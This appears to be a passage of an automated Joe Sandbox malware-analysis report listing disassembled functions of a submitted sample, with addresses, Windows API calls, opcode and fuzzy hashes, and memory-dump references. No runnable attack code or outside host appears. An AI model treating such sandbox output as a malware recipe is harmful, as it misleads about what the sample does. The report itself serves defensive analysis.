                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: b6f6b2812a1a96ad07f91aef9e715d17ed459869edf532f849d47c03503aad5f
                                                              • Instruction ID: 19678c1c9f82e007b7728394c975a90c0109691add2694b625e1fb85b62de38a
                                                              • Opcode Fuzzy Hash: b6f6b2812a1a96ad07f91aef9e715d17ed459869edf532f849d47c03503aad5f
                                                              • Instruction Fuzzy Hash: 09E0ED72501218EBCB10DF56C541B99BBE8EB08365F10C05BA89697241E378AE44DB95
                                                              Function 00442B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00442BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: f3c26d0ad36e199e973956b0ad232297bc00f56f59587217f732eb431076a7dd
                                                              • Instruction ID: d77f576c65b42b0e22032742b3b549ebcf04a5a6c2ec0c8c8eb4c969d71598eb
                                                              • Opcode Fuzzy Hash: f3c26d0ad36e199e973956b0ad232297bc00f56f59587217f732eb431076a7dd
                                                              • Instruction Fuzzy Hash: D7D0A735554340247C142E723B025492745DD41B7A7F0069FF420959C1DADCE240511D
                                                              Function 004212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: f11cb8a1726c836ff94f9816cd741c396e220fdcdb50f8becfd43ad090927ec3
                                                              • Instruction ID: 10d3fb6fa5e6712b9a6e6bfe7b5641c65fbf9f19f9e05453a4f78fd5d21db211
                                                              • Opcode Fuzzy Hash: f11cb8a1726c836ff94f9816cd741c396e220fdcdb50f8becfd43ad090927ec3
                                                              • Instruction Fuzzy Hash: F8C0123205C200BECB010FB4DC0DC2FBBA8ABA5B12F04CD2CB0A5C0060E238C910DB11
                                                              Function 00421A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 505456f663d063de25004ae9620d577045463245f504dfa3a84f96cf86f98e62
                                                              • Instruction ID: 101a5e24d3f91e8fcbfdaa50aa28b0790ea2bd5e1715c1e18f3e64c0fad514f5
                                                              • Opcode Fuzzy Hash: 505456f663d063de25004ae9620d577045463245f504dfa3a84f96cf86f98e62
                                                              • Instruction Fuzzy Hash: 8DC1D630B002649FEF15CF24D494BAA7FB5AF25310F4801BBEC459B3A2DB38A945CB65
                                                              Function 00423BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9616ead88e993dd6a766fbe5f0e9e8353b465d03b0521fb98a6c258b65e383f3
                                                              • Instruction ID: e73a02378ef37432267300165bae69ea9f28bade0fccbea448ead2beadff2d23
                                                              • Opcode Fuzzy Hash: 9616ead88e993dd6a766fbe5f0e9e8353b465d03b0521fb98a6c258b65e383f3
                                                              • Instruction Fuzzy Hash: FF71D371600B549EDB35DF71D8419E7B7F9AF14305F81082FE6AB83241DA3A6648CF19
                                                              Function 00428284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00428289
                                                                • Part of subcall function 004213DC: __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 0042A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: 88ad6f9256bd7379f83de57de686fc988454281e4b0deb2263ddfaa04eda6d42
                                                              • Instruction ID: 9db95290f32989cfea56acb632f040ab6bf6c4959ee5db1d62cb55ac2da37551
                                                              • Opcode Fuzzy Hash: 88ad6f9256bd7379f83de57de686fc988454281e4b0deb2263ddfaa04eda6d42
                                                              • Instruction Fuzzy Hash: CC41E771A052789ADB20EB61DC51AEEB378AF14304F8404EFE44A97193EB796EC5CB14
                                                              Function 004213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 00425E37: __EH_prolog.LIBCMT ref: 00425E3C
                                                                • Part of subcall function 0042CE40: __EH_prolog.LIBCMT ref: 0042CE45
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 63c34aa18f2da00dab460fab2c33152e86bc60ae0d12f54e67ad6e324558693e
                                                              • Instruction ID: 1bbc9be3fe2c2347276df1cd5f1e516d81790d90cedda3a30b7c598919bfa3d5
                                                              • Opcode Fuzzy Hash: 63c34aa18f2da00dab460fab2c33152e86bc60ae0d12f54e67ad6e324558693e
                                                              • Instruction Fuzzy Hash: E4414CB0A05B409EE724DF3A8885AE6FBE5BF18304F50496FD5EE83292C7356654CB14
                                                              Function 004213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004213E1
                                                                • Part of subcall function 00425E37: __EH_prolog.LIBCMT ref: 00425E3C
                                                                • Part of subcall function 0042CE40: __EH_prolog.LIBCMT ref: 0042CE45
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 1e9a275a8d3285128a8ce731f96b75be44b1ba0001856ef2f73e5af1283c8b43
                                                              • Instruction ID: 5f1d93aeef74ec4bc9f3ed370ccb1700e6c024db284b231edc2b0f533b4f51f8
                                                              • Opcode Fuzzy Hash: 1e9a275a8d3285128a8ce731f96b75be44b1ba0001856ef2f73e5af1283c8b43
                                                              • Instruction Fuzzy Hash: D4415AB0905B409AE724DF3A8885AE6FBE5BF28304F50496FD5EE83282C7352654CB14
                                                              Function 0043B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043B098
                                                                • Part of subcall function 004213DC: __EH_prolog.LIBCMT ref: 004213E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: fd7c2726f77a13edddba52a5d347636010d74bc0fc3c8f261908dae625047e1f
                                                              • Instruction ID: 5cd755456bcaed76cf62832eeb143801e11388186871a6dbe3d1f92d8e05d5c2
                                                              • Opcode Fuzzy Hash: fd7c2726f77a13edddba52a5d347636010d74bc0fc3c8f261908dae625047e1f
                                                              • Instruction Fuzzy Hash: 6B31BE71D002199BDF14DF66D851AEEBBB4AF18308F50449FE809B3242D739AE04CBA9
                                                              Function 0044AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0044ACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 2a77b8a96a15cbe76c18aef96f5ac900ddeac5fb5b84c17bda6fdbe6f42ace40
                                                              • Instruction ID: 49edbe427ae396c74daa9283b8016cdf606f4fb2218a80549a3e67ec081a18d2
                                                              • Opcode Fuzzy Hash: 2a77b8a96a15cbe76c18aef96f5ac900ddeac5fb5b84c17bda6fdbe6f42ace40
                                                              • Instruction Fuzzy Hash: FC119C73A403255FBB258F19EC8085B7392EB8432571A4132FC11EB384D738DC1187CA
                                                              Function 00429215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 57c762782c521ed90848f0c78459fc808b1c3781f88346f34a053e09f6f9a154
                                                              • Instruction ID: 5cf95cf5db8431b0971fab1230ba95c08868bb353acaf27cdb59d5bdfdbccd87
                                                              • Opcode Fuzzy Hash: 57c762782c521ed90848f0c78459fc808b1c3781f88346f34a053e09f6f9a154
                                                              • Instruction Fuzzy Hash: A8018633E00534EBCF15EBA9DD819DEB731AF88744F41456BE811B7252DA38CD0486B4
                                                              Function 00443C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00443C3F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 431981f29139d05fbc2e4396ff366d85dea494589e69c8883765315922520de3
                                                              • Instruction ID: a8832ad87c00cc3e36a4465ce1d83fca701af7d23431b209567b88b314d685cb
                                                              • Opcode Fuzzy Hash: 431981f29139d05fbc2e4396ff366d85dea494589e69c8883765315922520de3
                                                              • Instruction Fuzzy Hash: FCF0A7372002169FAF114E69EC4099B7799EF01F667104126FA15E7290DB35EA20C7D4
                                                              Function 00448E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 36a030fb12892fdbeff439c7f953cb174ae5bd7567464042f49a6a36afccca35
                                                              • Instruction ID: 19f4de2136d77422c8df9ccc6a64132ba765af7088b0c019c4f357dceffaeded
                                                              • Opcode Fuzzy Hash: 36a030fb12892fdbeff439c7f953cb174ae5bd7567464042f49a6a36afccca35
                                                              • Instruction Fuzzy Hash: 87E0ED3120222557FA712A629C06B9F76489F41BA8F35012FBC08E6281CF28CC0182EE
                                                              Function 00425ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00425AC2
                                                                • Part of subcall function 0042B505: __EH_prolog.LIBCMT ref: 0042B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: ea6bdaa99cc441855d9f6a4015278becd29fb74868024a29e52a3c7e80ece072
                                                              • Instruction ID: 873b9cdfaf50022bd5127b96b2791181474533e7c6597ab67da34382a82decc1
                                                              • Opcode Fuzzy Hash: ea6bdaa99cc441855d9f6a4015278becd29fb74868024a29e52a3c7e80ece072
                                                              • Instruction Fuzzy Hash: 4B01F430500790DAD715EBB9C0527DEF7E4DF28308F50858FA45653283CBB81B08DBA6
                                                              Function 0042A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6C4
                                                                • Part of subcall function 0042A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6F2
                                                                • Part of subcall function 0042A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: 2db4fffb7b6579eb5a458eebec5c456c762be54294c458748c757316368962dd
                                                              • Instruction ID: 0bdc8bf1436359a8e0e6b196d12018d0fdf1f44d5102a3ff56f6ff2a0799052d
                                                              • Opcode Fuzzy Hash: 2db4fffb7b6579eb5a458eebec5c456c762be54294c458748c757316368962dd
                                                              • Instruction Fuzzy Hash: 1FF0B4310087A0ABCA2257B458007C77BD05F15325F448A4FF9F912296C36950A48B37
                                                              Function 00430E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00430E3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 34df54dc74226cc8a571ac2d8389195f5e8abc9c0c5503eac5a782be30f9517d
                                                              • Instruction ID: cb6f71e3f87e1b4bdc84944f4352a3b44e5cd39f40f47e8135c828b51ac3f490
                                                              • Opcode Fuzzy Hash: 34df54dc74226cc8a571ac2d8389195f5e8abc9c0c5503eac5a782be30f9517d
                                                              • Instruction Fuzzy Hash: 86D0C21170116416DE21332A28267FF650A8FCA319F0D106BF14A577A3DE4C4882A26E
                                                              Function 0043A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0043A62C
                                                                • Part of subcall function 0043A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043A3DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 466aa00316989ea50814178fa426f0109bee37393e0e69b456de9f789de51794
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: 2FD0A73024020876DF02AB228C0396E7595EB04344F109027BCC1C5181EAB5DD20915B
                                                              Function 0043DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00431B3E), ref: 0043DD92
